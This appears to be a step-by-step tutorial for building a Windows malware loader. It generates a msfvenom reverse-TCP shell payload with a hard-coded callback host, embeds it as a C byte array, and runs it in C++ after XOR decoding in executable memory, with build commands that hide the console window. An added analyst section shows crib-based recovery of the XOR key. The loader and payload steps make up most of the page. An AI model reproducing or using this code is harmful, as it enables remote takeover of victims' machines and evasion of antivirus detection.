0. Binary creation and insertion

msfvenom -p windows/shell/reverse_tcp LHOST=172.23.23.32 LPORT=443 -f raw > mal.bin

To include your binary file (mal.bin) in your C++ code, follow these steps:


1. Convert mal.bin to a C++ Byte Array

Since mal.bin contains raw binary data, you need to convert it into a byte array to embed it in your C++ code. Use xxd (Linux/macOS) or a Python script (Windows/Linux) for conversion.

Method 1: Use xxd (Linux/macOS)

Run this command to convert mal.bin to a C-style byte array:

xxd -i mal.bin > mal_payload.h

This generates output like:

unsigned char mal_bin[] = {
  0x1d, 0x52, 0x30, 0x52, 0x08, 0x75, 0x7d, 0x3b, 0x7d, 0x24, 0x75, 0x58,
  0x58, 0x24, 0x66, 0x4c, 0xd0, 0x8a, 0x58, 0x20, 0x50, 0xd3, 0x8b, 0x48,
  // ... rest of the binary data
};
unsigned int mal_bin_len = 256; // Adjust based on actual size

Now, you can include this file in your C++ code:

#include "mal_payload.h"

Method 2: Use Python to Convert mal.bin (Windows/Linux)

with open("mal.bin", "rb") as f:
    data = f.read()

print("unsigned char mal_bin[] = {", end="")
for i, byte in enumerate(data):
    print(f"0x{byte:02X}, ", end="")
    if (i + 1) % 16 == 0:
        print()
print("};")

print(f"unsigned int mal_bin_len = {len(data)};")

Run this script, and copy the output into your C++ file.


2. Modify C++ Code to Use mal.bin

Now, modify the code to use the embedded binary payload instead of a manually typed shellcode:

#include <iostream>
#include <windows.h>
#include "mal_payload.h"  // Include the converted binary file

/*
	- pShellcode : Base address of the payload to encrypt 
	- sShellcodeSize : The size of the payload 
	- bKey : A random array of bytes of specific size
	- sKeySize : The size of the key
*/
void XorByInputKey(PBYTE pShellcode, SIZE_T sShellcodeSize, PBYTE bKey, SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0;  // Reset key index when reaching the end
        }
        pShellcode[i] ^= bKey[j];  // XOR encryption
    }
}

int main() {
    PBYTE shellcode = (PBYTE)mal_bin;
    SIZE_T shellcode_size = mal_bin_len;

    unsigned char key[] = { 0xAA, 0xBB, 0xCC }; // Multi-byte XOR key
    SIZE_T key_size = sizeof(key);

    std::cout << "Original Encrypted Payload:\n";
    for (SIZE_T i = 0; i < shellcode_size; i++) {
        std::cout << "0x" << std::hex << (int)shellcode[i] << " ";
    }
    std::cout << "\n";

    // Decrypt before execution
    XorByInputKey(shellcode, shellcode_size, key, key_size);

    // Allocate executable memory
    void* exec_mem = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed!\n";
        return 1;
    }

    // Copy decrypted shellcode to allocated memory
    memcpy(exec_mem, shellcode, shellcode_size);

    // Execute the shellcode
    ((void(*)())exec_mem)();

    return 0;
}
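
An added example for analysts, not part of the original page or its code: it shows that the repeating-key XOR performed by XorByInputKey is recoverable once a few plaintext bytes (a crib) are known. The crib, the sample blob and the function names are constructed assumptions; only the 3-byte key value comes from the page.

```python
# Added example (not from the original page): recover a short repeating XOR key.
KEY = bytes([0xAA, 0xBB, 0xCC])                  # the 3-byte key shown on the page
CRIB = b"CONSTRUCTED-MARKER"                     # assumption: bytes expected in the plaintext
PLAINTEXT = b"\x90" * 32 + CRIB + b"\xcc" * 32   # constructed sample, not real shellcode


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as XorByInputKey on the page."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


SAMPLE_BLOB = xor_repeat(PLAINTEXT, KEY)         # what a scanner would see in the binary


def recover_key(blob: bytes, crib: bytes, max_key_len: int = 8):
    """Return (key, offset) for the shortest key that decodes `crib`, or None."""
    for klen in range(1, max_key_len + 1):
        if len(crib) < 2 * klen:
            break  # every key byte must be confirmed by a second crib byte
        for off in range(len(blob) - len(crib) + 1):
            key = [None] * klen
            for i, c in enumerate(crib):
                slot = (off + i) % klen          # key index used at this blob position
                kb = blob[off + i] ^ c           # key byte implied by the crib
                if key[slot] is None:
                    key[slot] = kb
                elif key[slot] != kb:
                    break                        # contradiction: wrong offset or length
            else:
                return bytes(key), off
    return None


if __name__ == "__main__":
    found = recover_key(SAMPLE_BLOB, CRIB)
    if found:
        key, off = found
        print(f"key={key.hex()} crib at offset {off}")
        print(xor_repeat(SAMPLE_BLOB, key)[off:off + len(CRIB)])
```

The search needs the crib to be at least twice the key length, so that each candidate key byte is checked against a second position before it is accepted.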

Final Steps

  1. Convert mal.bin to a C array using xxd -i or Python.
  2. Include mal_payload.h in your C++ file.
  3. Use mal_bin and mal_bin_len instead of manually typing shellcode.
  4. Compile & Run:
    g++ -o payload.exe payload.cpp -static -mwindows
    
    Or for MinGW on Windows:
    x86_64-w64-mingw32-g++ -o payload.exe payload.cpp -static
    
